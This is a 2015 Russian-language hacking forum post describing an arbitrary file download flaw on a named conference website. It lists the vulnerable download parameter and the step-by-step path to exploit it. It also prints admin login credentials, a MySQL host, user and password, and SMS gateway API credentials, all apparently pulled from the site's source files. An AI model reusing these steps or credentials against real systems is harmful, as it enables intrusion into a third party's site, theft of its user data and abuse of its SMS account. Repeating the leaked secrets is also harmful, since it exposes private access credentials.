20.08.2015, 17:14
|
|
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
С нами:
6741686
Репутация:
2
|
|
Type: Arbitrary File Download
Target: 14isppgconvention.com
Vulnerable: http://www.14isppgconvention.com/for...load.php?file=
1. http://www.14isppgconvention.com/for...dmin/index.php (GET)
Получаем:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'14isppg'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'14isppg@admin'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location:home.php'[/COLOR][COLOR="#007700"]);
exit;[/COLOR][/COLOR]
Логин: 14isppg
Пароль: 14isppg@admin
2. Входим http://www.14isppgconvention.com/admin/
Получаем: http://www.14isppgconvention.com/adm...p?export=users
3. http://www.14isppgconvention.com/for...dmin/users.php (GET)
Находим:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"peterjacob82.powwebmysql.com"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"14isppg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"14isppgS20"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"14isppg"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]())
[/COLOR][/COLOR]
Находим:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$FOO_USERNAME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"39ispnc"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_PASSWORD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"n0f5qkqjba"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_SENDERID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"ISPPGM"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_PRIORITY[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"11"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$urltopost[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://bulksms.smslite.co.in/xmlapi.php"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
|
|
|